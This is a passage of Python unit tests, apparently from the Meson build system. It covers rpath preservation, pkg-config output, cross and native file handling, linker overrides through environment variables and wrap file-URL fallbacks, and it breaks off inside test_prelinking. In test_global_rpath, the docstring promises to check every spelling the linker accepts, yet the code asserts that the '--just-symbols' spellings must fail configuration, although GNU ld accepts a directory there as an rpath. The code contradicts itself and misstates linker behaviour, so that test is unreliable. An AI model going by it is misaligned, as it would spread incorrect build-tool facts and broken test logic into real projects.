    self.assertEqual(install_rpath, 'baz:/foo/dummy')
def test_global_rpath(self):
    '''
    Test that an rpath supplied globally via LDFLAGS survives installation,
    for every rpath flag spelling the linker accepts.
    '''
    if is_cygwin():
        raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
    if is_osx():
        raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
    testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
    oldinstalldir = self.installdir
    # Build and install an external library without DESTDIR.
    # The external library generates a .pc file without an rpath.
    yonder_dir = os.path.join(testdir, 'yonder')
    yonder_prefix = os.path.join(oldinstalldir, 'yonder')
    yonder_libdir = os.path.join(yonder_prefix, self.libdir)
    self.prefix = yonder_prefix
    self.installdir = yonder_prefix
    self.init(yonder_dir)
    self.build()
    self.install(use_destdir=False)
    # Since rpath has multiple valid formats we need to
    # test that they are all properly used.
    # The second tuple element marks spellings that must be rejected
    # (--just-symbols with a directory is an error).
    rpath_formats = [
        ('-Wl,-rpath=', False),
        ('-Wl,-rpath,', False),
        ('-Wl,--just-symbols=', True),
        ('-Wl,--just-symbols,', True),
        ('-Wl,-R', False),
        ('-Wl,-R,', False)
    ]
    for rpath_format, exception in rpath_formats:
        # Build an app that uses that installed library.
        # Supply the rpath to the installed library via LDFLAGS
        # (as systems like buildroot and guix are wont to do)
        # and verify install preserves that rpath.
        self.new_builddir()
        env = {'LDFLAGS': rpath_format + yonder_libdir,
               'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
        if exception:
            # This spelling must make configuration fail.
            with self.assertRaises(subprocess.CalledProcessError):
                self.init(testdir, override_envvars=env)
            continue
        self.init(testdir, override_envvars=env)
        self.build()
        self.install(use_destdir=False)
        got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
        # Pass rpath_format as the assertion message so a failure shows
        # which spelling broke.
        self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
    '''Precompiled headers must still build when ASan is enabled, and the
    sanitizer flag must be present on every compile command.'''
    if is_cygwin():
        raise unittest.SkipTest('asan not available on Cygwin')
    if is_openbsd():
        raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
    testdir = os.path.join(self.common_test_dir, '13 pch')
    self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
    self.build()
    # Check each compilation database entry for the sanitizer flag.
    for entry in self.get_compdb():
        self.assertIn("-fsanitize=address", entry["command"])
def test_cross_find_program(self):
    '''
    Test that find_program() resolves binaries declared in the cross file,
    both as a list and as a plain string.
    '''
    testdir = os.path.join(self.unit_test_dir, '11 cross prog')
    # NamedTemporaryFile keeps the file alive for the duration of the test.
    crossfile = tempfile.NamedTemporaryFile(mode='w')
    print(os.path.join(testdir, 'some_cross_tool.py'))
    tool_path = os.path.join(testdir, 'some_cross_tool.py')
    crossfile.write(textwrap.dedent(f'''\
        [binaries]
        c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
        ar = '{shutil.which('ar')}'
        strip = '{shutil.which('strip')}'
        sometool.py = ['{tool_path}']
        someothertool.py = '{tool_path}'

        [properties]

        [host_machine]
        system = 'linux'
        cpu_family = 'arm'
        cpu = 'armv7' # Not sure if correct.
        endian = 'little'
        '''))
    crossfile.flush()
    self.meson_cross_file = crossfile.name
    # Configuring succeeds only if the cross tools are found.
    self.init(testdir)
def test_reconfigure(self):
    '''Reconfiguring an already-configured build directory must succeed.'''
    srcdir = os.path.join(self.unit_test_dir, '13 reconfigure')
    self.init(srcdir, extra_args=['-Db_coverage=true'], default_args=False)
    self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
    '''
    Test that valac outputs generated C files in the expected location when
    the builddir is a subdir of the source tree.
    '''
    if not shutil.which('valac'):
        raise unittest.SkipTest('valac not installed.')
    testdir = os.path.join(self.vala_test_dir, '8 generated sources')
    # Copy the test into the scratch builddir so we can nest a builddir
    # inside it without polluting the source checkout.
    newdir = os.path.join(self.builddir, 'srctree')
    shutil.copytree(testdir, newdir)
    testdir = newdir
    # New builddir
    builddir = os.path.join(testdir, 'subdir/_build')
    os.makedirs(builddir, exist_ok=True)
    self.change_builddir(builddir)
    self.init(testdir)
    self.build()
def test_old_gnome_module_codepaths(self):
    '''
    A lot of code in the GNOME module is conditional on the version of the
    glib tools that are installed, and breakages in the old code can slip
    by once the CI has a newer glib version. So we force the GNOME module
    to pretend that it's running on an ancient glib so the fallback code is
    also tested.
    '''
    testdir = os.path.join(self.framework_test_dir, '7 gnome')
    # Monkey-patch the module-level version; restored in finally below.
    mesonbuild.modules.gnome.native_glib_version = '2.20'
    env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
    try:
        # inprocess=True so the patched module state is visible to meson.
        self.init(testdir,
                  inprocess=True,
                  override_envvars=env)
        self.build(override_envvars=env)
    finally:
        mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
    '''
    Install a library with a generated .pc file, then verify the .pc file
    does not leak internal libraries/deps and that a dependee project can
    build and run against it.
    '''
    testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
    testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
    if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
                       stdout=subprocess.DEVNULL,
                       stderr=subprocess.DEVNULL) != 0:
        raise unittest.SkipTest('Glib 2.0 dependency not available.')
    with tempfile.TemporaryDirectory() as tempdirname:
        # Install the dependency project into the temp prefix.
        self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
        self.install(use_destdir=False)
        # Reuse the builddir for the dependee below.
        shutil.rmtree(self.builddir)
        os.mkdir(self.builddir)
        pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
        self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
        lib_dir = os.path.join(tempdirname, 'lib')
        myenv = os.environ.copy()
        myenv['PKG_CONFIG_PATH'] = pkg_dir
        # Private internal libraries must not leak out.
        pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
        self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
        # Dependencies must not leak to cflags when building only a shared library.
        pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
        self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
        # Test that the result is usable.
        self.init(testdir2, override_envvars=myenv)
        self.build(override_envvars=myenv)
        myenv = os.environ.copy()
        myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
        if is_cygwin():
            # On Cygwin the DLL is found via PATH, not LD_LIBRARY_PATH.
            bin_dir = os.path.join(tempdirname, 'bin')
            myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
        self.assertTrue(os.path.isdir(lib_dir))
        test_exe = os.path.join(self.builddir, 'pkguser')
        self.assertTrue(os.path.isfile(test_exe))
        # The built dependee must run against the installed library.
        subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
    '''
    Test that a .pc file using relative -L paths produces correctly
    quoted/normalized link arguments.
    '''
    testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
    pkg_dir = os.path.join(testdir, 'pkgconfig')
    self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))

    env = get_fake_env(testdir, self.builddir, self.prefix)
    env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='')
    kwargs = {'required': True, 'silent': True}
    relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
    self.assertTrue(relative_path_dep.found())

    # Ensure link_args are properly quoted
    # The relative -L from the .pc file is resolved against the builddir.
    libpath = Path(self.builddir) / '../relativepath/lib'
    link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
    self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_duplicate_path_entries(self):
    '''
    Test that adding the same directory to pkg_config_path twice does not
    produce duplicate entries.
    '''
    testdir = os.path.join(self.unit_test_dir, '111 pkgconfig duplicate path entries')
    pkg_dir = os.path.join(testdir, 'pkgconfig')

    env = get_fake_env(testdir, self.builddir, self.prefix)
    env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='')

    # Setting up the env again with the same dir must deduplicate.
    PkgConfigDependency.setup_env({}, env, MachineChoice.HOST, pkg_dir)

    pkg_config_path = env.coredata.options[OptionKey('pkg_config_path')].value
    self.assertTrue(len(pkg_config_path) == 1)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
    '''
    Test that an app can be built against an installed static library
    found purely through its generated pkg-config file.
    '''
    with tempfile.TemporaryDirectory() as tempdirname:
        # build library
        testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
        testdirlib = os.path.join(testdirbase, 'lib')
        self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
                                          '--libdir=lib',
                                          '--default-library=static'], default_args=False)
        self.build()
        self.install(use_destdir=False)

        # build user of library
        pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
        self.new_builddir()
        self.init(os.path.join(testdirbase, 'app'),
                  override_envvars={'PKG_CONFIG_PATH': pkg_dir})
        self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
    '''
    Check that Meson produces valid static archives with --strip enabled
    '''
    with tempfile.TemporaryDirectory() as tempdirname:
        testdirbase = os.path.join(self.unit_test_dir, '66 static archive stripping')

        # build lib
        self.new_builddir()
        testdirlib = os.path.join(testdirbase, 'lib')
        testlibprefix = os.path.join(tempdirname, 'libprefix')
        self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
                                          '--libdir=lib',
                                          '--default-library=static',
                                          '--buildtype=debug',
                                          '--strip'], default_args=False)
        self.build()
        self.install(use_destdir=False)

        # build executable (uses lib, fails if static archive has been stripped incorrectly)
        pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
        self.new_builddir()
        self.init(os.path.join(testdirbase, 'app'),
                  override_envvars={'PKG_CONFIG_PATH': pkg_dir})
        self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
    '''
    Test that the generated .pc file lists the expected -l flags.
    '''
    testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
    self.init(testdir)
    myenv = os.environ.copy()
    # The generated .pc file lives in the build's private dir.
    myenv['PKG_CONFIG_PATH'] = self.privatedir
    stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
    deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
    if is_windows() or is_cygwin() or is_osx() or is_openbsd():
        # On Windows, libintl is a separate library
        deps.append(b'-lintl')
    # Order is not guaranteed; compare as sets.
    self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
    '''
    Test that a C# library's .pc file emits a -r reference to the DLL
    rather than C-style -l flags.
    '''
    testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
    self.init(testdir)
    myenv = os.environ.copy()
    myenv['PKG_CONFIG_PATH'] = self.privatedir
    stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)

    self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
    '''
    Test that libraries are listed before their dependencies.
    '''
    testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
    self.init(testdir)
    myenv = os.environ.copy()
    myenv['PKG_CONFIG_PATH'] = self.privatedir
    stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
    deps = stdo.split()
    # Static linkers require the dependent library to come first.
    self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
    '''
    Test that the dependencies are always listed in a deterministic order.
    '''
    testdir = os.path.join(self.unit_test_dir, '43 dep order')
    self.init(testdir)
    with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
        for line in bfile:
            # '.exe' variant covers Windows cross builds.
            if 'build myexe:' in line or 'build myexe.exe:' in line:
                self.assertIn('liblib1.a liblib2.a', line)
                return
    # The build rule must exist; otherwise the test is meaningless.
    raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
    '''
    Test that the rpaths are always listed in a deterministic order.
    '''
    if is_cygwin():
        raise unittest.SkipTest('rpath are not used on Cygwin')
    testdir = os.path.join(self.unit_test_dir, '42 rpath order')
    self.init(testdir)
    if is_osx():
        rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
    else:
        # '$$' because '$' is escaped in ninja files.
        rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
    with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
        for line in bfile:
            if '-rpath' in line:
                self.assertRegex(line, rpathre)
                return
    # The rpath flag must appear somewhere in the ninja file.
    raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
    '''
    Test that we produce the correct dependencies when a program is overridden with an executable.
    '''
    testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe')
    self.init(testdir)
    # Count matches so the test cannot pass vacuously if the generator
    # rules are renamed; sibling ninja-scanning tests raise in that case.
    matched = 0
    with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
        for line in bfile:
            if 'main1.c:' in line or 'main2.c:' in line:
                # The generating executable must be an order-only dep.
                self.assertIn('| subprojects/sub/foobar', line)
                matched += 1
    self.assertGreater(matched, 0, 'No generator rules for main1.c/main2.c found in build.ninja')
@skipIfNoPkgconfig
def test_usage_external_library(self):
    '''
    Test that uninstalled usage of an external library (from the system or
    PkgConfigDependency) works. On macOS, this workflow works out of the
    box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
    as LD_LIBRARY_PATH, etc, so this test is skipped.

    The system library is found with cc.find_library() and pkg-config deps.
    '''
    oldprefix = self.prefix
    # Install external library so we can find it
    testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
    # install into installdir without using DESTDIR
    installdir = self.installdir
    self.prefix = installdir
    self.init(testdir)
    # Restore prefix immediately so later inits use the original value.
    self.prefix = oldprefix
    self.build()
    self.install(use_destdir=False)
    ## New builddir for the consumer
    self.new_builddir()
    env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
           'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
    testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
    # install into installdir without using DESTDIR
    self.prefix = self.installdir
    self.init(testdir, override_envvars=env)
    self.prefix = oldprefix
    self.build(override_envvars=env)
    # test uninstalled
    self.run_tests(override_envvars=env)
    if not (is_osx() or is_linux()):
        return
    # test running after installation
    self.install(use_destdir=False)
    prog = os.path.join(self.installdir, 'bin', 'prog')
    self._run([prog])
    if not is_osx():
        # Rest of the workflow only works on macOS
        return
    # The installed binary must not reference @rpath.
    out = self._run(['otool', '-L', prog])
    self.assertNotIn('@rpath', out)
    ## New builddir for testing that DESTDIR is not added to install_name
    self.new_builddir()
    # install into installdir with DESTDIR
    self.init(testdir, override_envvars=env)
    self.build(override_envvars=env)
    # test running after installation
    self.install(override_envvars=env)
    prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
    lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
    for f in prog, lib:
        out = self._run(['otool', '-L', f])
        # Ensure that the otool output does not contain self.installdir
        self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
    '''
    Build and install two external libraries, to different prefixes,
    then build and install a client program that finds them via pkgconfig,
    and verify the installed client program runs.
    '''
    oldinstalldir = self.installdir

    # Build and install both external libraries without DESTDIR
    val1dir = os.path.join(self.unit_test_dir, '75 pkgconfig prefixes', 'val1')
    val1prefix = os.path.join(oldinstalldir, 'val1')
    self.prefix = val1prefix
    self.installdir = val1prefix
    self.init(val1dir)
    self.build()
    self.install(use_destdir=False)
    self.new_builddir()

    # val2 depends on val1 via its pkgconfig file.
    env1 = {}
    env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
    val2dir = os.path.join(self.unit_test_dir, '75 pkgconfig prefixes', 'val2')
    val2prefix = os.path.join(oldinstalldir, 'val2')
    self.prefix = val2prefix
    self.installdir = val2prefix
    self.init(val2dir, override_envvars=env1)
    self.build()
    self.install(use_destdir=False)
    self.new_builddir()

    # Build, install, and run the client program
    env2 = {}
    env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
    testdir = os.path.join(self.unit_test_dir, '75 pkgconfig prefixes', 'client')
    testprefix = os.path.join(oldinstalldir, 'client')
    self.prefix = testprefix
    self.installdir = testprefix
    self.init(testdir, override_envvars=env2)
    self.build()
    self.install(use_destdir=False)
    prog = os.path.join(self.installdir, 'bin', 'client')
    env3 = {}
    if is_cygwin():
        # DLLs are found via PATH on Cygwin, not rpath.
        env3['PATH'] = os.path.join(val1prefix, 'bin') + \
            os.pathsep + \
            os.path.join(val2prefix, 'bin') + \
            os.pathsep + os.environ['PATH']
    out = self._run([prog], override_envvars=env3).strip()
    # Expected output is val1 + val2 = 3
    self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
    '''
    Test that installation of broken symlinks works fine.

    `testdir` is a directory name under common_test_dir; `subdir_path`
    is the subdirectory (relative to it) in which the dangling symlink
    is created and from which it is installed.

    https://github.com/mesonbuild/meson/issues/3914
    '''
    testdir = os.path.join(self.common_test_dir, testdir)
    subdir = os.path.join(testdir, subdir_path)
    with chdir(subdir):
        # Can't distribute broken symlinks in the source tree because it breaks
        # the creation of zipapps. Create it dynamically and run the test by
        # hand.
        src = '../../nonexistent.txt'
        os.symlink(src, 'invalid-symlink.txt')
        try:
            self.init(testdir)
            self.build()
            self.install()
            install_path = subdir_path.split(os.path.sep)[-1]
            link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
            # The link itself must be installed as a symlink with the same
            # (dangling) target, and must not have been resolved to a file.
            self.assertTrue(os.path.islink(link), msg=link)
            self.assertEqual(src, os.readlink(link))
            self.assertFalse(os.path.isfile(link), msg=link)
        finally:
            # Always remove the symlink from the source tree again.
            os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
    '''Broken symlinks installed via install_subdir() survive install.'''
    self.install_subdir_invalid_symlinks('59 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
    '''Broken symlinks survive install when only the umask applies.'''
    self.install_subdir_invalid_symlinks('190 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
    '''Broken symlinks survive install when an install_mode is also set.'''
    self.install_subdir_invalid_symlinks('190 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
    '''
    Test that -Wl,--export-dynamic is deduplicated and appears at most
    once on any line of the generated ninja file.
    '''
    testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
    if is_cygwin() or is_osx():
        raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    linker = cc.linker
    if not linker.export_dynamic_args(env):
        raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
    self.init(testdir)
    build_ninja = os.path.join(self.builddir, 'build.ninja')
    max_count = 0
    search_term = '-Wl,--export-dynamic'
    # Track the maximum per-line occurrence count across the whole file.
    with open(build_ninja, encoding='utf-8') as f:
        for line in f:
            max_count = max(max_count, line.count(search_term))
    self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
    '''
    Test that common compiler libraries (-ldl, -lm, ...) are not
    duplicated on any link line.
    '''
    testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
    self.init(testdir)
    build_ninja = os.path.join(self.builddir, 'build.ninja')
    with open(build_ninja, encoding='utf-8') as f:
        lines = f.readlines()
    for lib in ('-ldl', '-lm', '-lc', '-lrt'):
        for line in lines:
            if lib not in line:
                continue
            # Assert that the library occurs exactly once on this line:
            # splitting on it yields exactly two pieces.
            self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
    # C_std defined in project options must be in effect also when native compiling.
    testdir = os.path.join(self.unit_test_dir, '51 noncross options')
    self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
    compdb = self.get_compdb()
    # Both translation units must be compiled with the project's c_std.
    self.assertEqual(len(compdb), 2)
    self.assertRegex(compdb[0]['command'], '-std=c99')
    self.assertRegex(compdb[1]['command'], '-std=c99')
    self.build()
def test_identity_cross(self):
    '''
    Test an "identity cross" build: native and cross compilers are both
    wrappers around the same host compiler, supplied via native/cross files.
    '''
    testdir = os.path.join(self.unit_test_dir, '61 identity cross')

    nativefile = tempfile.NamedTemporaryFile(mode='w')
    nativefile.write(textwrap.dedent('''\
        [binaries]
        c = ['{}']
        '''.format(os.path.join(testdir, 'build_wrapper.py'))))
    nativefile.flush()
    self.meson_native_file = nativefile.name

    crossfile = tempfile.NamedTemporaryFile(mode='w')
    crossfile.write(textwrap.dedent('''\
        [binaries]
        c = ['{}']
        '''.format(os.path.join(testdir, 'host_wrapper.py'))))
    crossfile.flush()
    self.meson_cross_file = crossfile.name

    # TODO should someday be explicit about build platform only here
    self.init(testdir)
def test_identity_cross_env(self):
    '''
    Same as test_identity_cross, but the native compiler comes from the
    CC_FOR_BUILD environment variable instead of a native file.
    '''
    testdir = os.path.join(self.unit_test_dir, '61 identity cross')
    env = {
        'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
    }
    crossfile = tempfile.NamedTemporaryFile(mode='w')
    crossfile.write(textwrap.dedent('''\
        [binaries]
        c = ['{}']
        '''.format(os.path.join(testdir, 'host_wrapper.py'))))
    crossfile.flush()
    self.meson_cross_file = crossfile.name
    # TODO should someday be explicit about build platform only here
    self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
    '''
    Test that a project can link against previously installed static
    libraries found via pkg-config and c_link_args.
    '''
    if is_cygwin():
        raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")

    # Build some libraries and install them
    testdir = os.path.join(self.unit_test_dir, '67 static link/lib')
    libdir = os.path.join(self.installdir, self.libdir)
    oldprefix = self.prefix
    self.prefix = self.installdir
    self.init(testdir)
    self.install(use_destdir=False)

    # Test that installed libraries works
    self.new_builddir()
    self.prefix = oldprefix
    meson_args = [f'-Dc_link_args=-L{libdir}',
                  '--fatal-meson-warnings']
    testdir = os.path.join(self.unit_test_dir, '67 static link')
    # PKG_CONFIG_LIBDIR (not _PATH) so only our install dir is searched.
    env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
    self.init(testdir, extra_args=meson_args, override_envvars=env)
    self.build()
    self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
    '''
    Helper: verify that setting the per-language linker environment
    variable selects the expected linker.

    check:    executable that must exist for the test to make sense
    name:     value to put in the environment variable
    lang:     meson language id ('c', 'cpp', 'rust', ...)
    expected: linker id the detected compiler must report
    '''
    if is_sunos():
        raise unittest.SkipTest('Solaris currently cannot override the linker.')
    if not shutil.which(check):
        raise unittest.SkipTest(f'Could not find {check}.')
    envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP[f'{lang}_ld']]

    # Also test a deprecated variable if there is one.
    if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
        envvars.append(
            mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])

    for envvar in envvars:
        with mock.patch.dict(os.environ, {envvar: name}):
            env = get_fake_env()
            comp = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
            if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler,
                                 mesonbuild.compilers.AppleClangCPPCompiler,
                                 mesonbuild.compilers.AppleClangObjCCompiler,
                                 mesonbuild.compilers.AppleClangObjCPPCompiler)):
                raise unittest.SkipTest('AppleClang is currently only supported with ld64')
            if lang != 'rust' and comp.use_linker_args('bfd') == []:
                raise unittest.SkipTest(
                    f'Compiler {comp.id} does not support using alternative linkers')
            self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
    # CC_LD=bfd must make the C compiler link with ld.bfd.
    self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
    # CC_LD=gold must make the C compiler link with ld.gold.
    self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
    # CC_LD=lld must make the C compiler link with ld.lld.
    self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
@skipIfNoExecutable('ld.gold')  # need an additional check here because _check_ld checks for gcc
def test_ld_environment_variable_rust(self):
    # rustc drives the link through gcc, so the linker is requested via
    # -fuse-ld rather than by a linker executable name.
    self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
    # CXX_LD=gold must make the C++ compiler link with ld.gold.
    self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
    # OBJC_LD=gold must make the Objective-C compiler link with ld.gold.
    self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
    # OBJCXX_LD=gold must make the Objective-C++ compiler link with ld.gold.
    self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
    # FC_LD=gold must make the Fortran compiler link with ld.gold.
    self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
    # At least for me, ldc defaults to gold, and gdc defaults to bfd, so
    # let's pick lld, which isn't the default for either (currently)
    if is_osx():
        expected = 'ld64'
    else:
        expected = 'ld.lld'
    self._check_ld('ld.lld', 'lld', 'd', expected)
def compute_sha256(self, filename):
    """Return the hex SHA-256 digest of *filename*.

    Reads the file in fixed-size chunks so large archives (wrap
    tarballs) do not have to be held in memory all at once; the
    resulting digest is identical to hashing the whole file.
    """
    digest = hashlib.sha256()
    with open(filename, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()
def test_wrap_with_file_url(self):
    """A wrap whose primary URLs are unreachable (server.invalid) must fall
    back to its file:// fallback URLs for both the source and the patch
    archive."""
    testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
    source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
    patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
    wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
    source_hash = self.compute_sha256(source_filename)
    patch_hash = self.compute_sha256(patch_filename)
    wrap = textwrap.dedent("""\
        [wrap-file]
        directory = foo
        source_url = http://server.invalid/foo
        source_fallback_url = file://{}
        source_filename = foo.tar.xz
        source_hash = {}
        patch_url = http://server.invalid/foo
        patch_fallback_url = file://{}
        patch_filename = foo-patch.tar.xz
        patch_hash = {}
        """.format(source_filename, source_hash, patch_filename, patch_hash))
    with open(wrap_filename, 'w') as f:
        f.write(wrap)
    self.init(testdir)
    self.build()
    self.run_tests()
    # Clean up the generated wrap artifacts so the test is re-runnable
    # from a pristine source tree.
    windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
    windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
    os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
    """A statically linked program must not carry an rpath entry."""
    source_dir = os.path.join(self.common_test_dir, '5 linkstatic')
    self.init(source_dir)
    self.build()
    prog_path = os.path.join(self.builddir, 'prog')
    self.assertIsNone(get_rpath(prog_path))
def test_lookup_system_after_broken_fallback(self):
    """A failed (non-required) fallback lookup must not poison a later
    system lookup of a different dependency."""
    # Just to generate libfoo.pc so we can test system dependency lookup.
    testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
    self.init(testdir)
    privatedir = self.privatedir

    # Write test project where the first dependency() returns not-found
    # because the 'broken' subproject does not exist, but that should not
    # prevent the 2nd dependency() from being looked up on the system.
    self.new_builddir()
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, 'meson.build'), 'w') as f:
            f.write(textwrap.dedent('''\
                project('test')
                dependency('notfound', fallback: 'broken', required: false)
                dependency('libfoo', fallback: 'broken', required: true)
                '''))
        self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
    """The generated bar1.pc must mention -lfoo, while bar2.pc (which
    consumes foo via link_whole) must not."""
    testdir = os.path.join(self.unit_test_dir, '77 as link whole')
    self.init(testdir)
    checks = [('bar1.pc', self.assertIn),
              ('bar2.pc', self.assertNotIn)]
    for pc_name, check in checks:
        with open(os.path.join(self.privatedir, pc_name)) as pc_file:
            check('-lfoo', pc_file.read())
def test_prelinking(self):
    # Prelinking currently only works on recently new GNU toolchains.
    # Skip everything else. When support for other toolchains is added,
    # remove limitations as necessary.
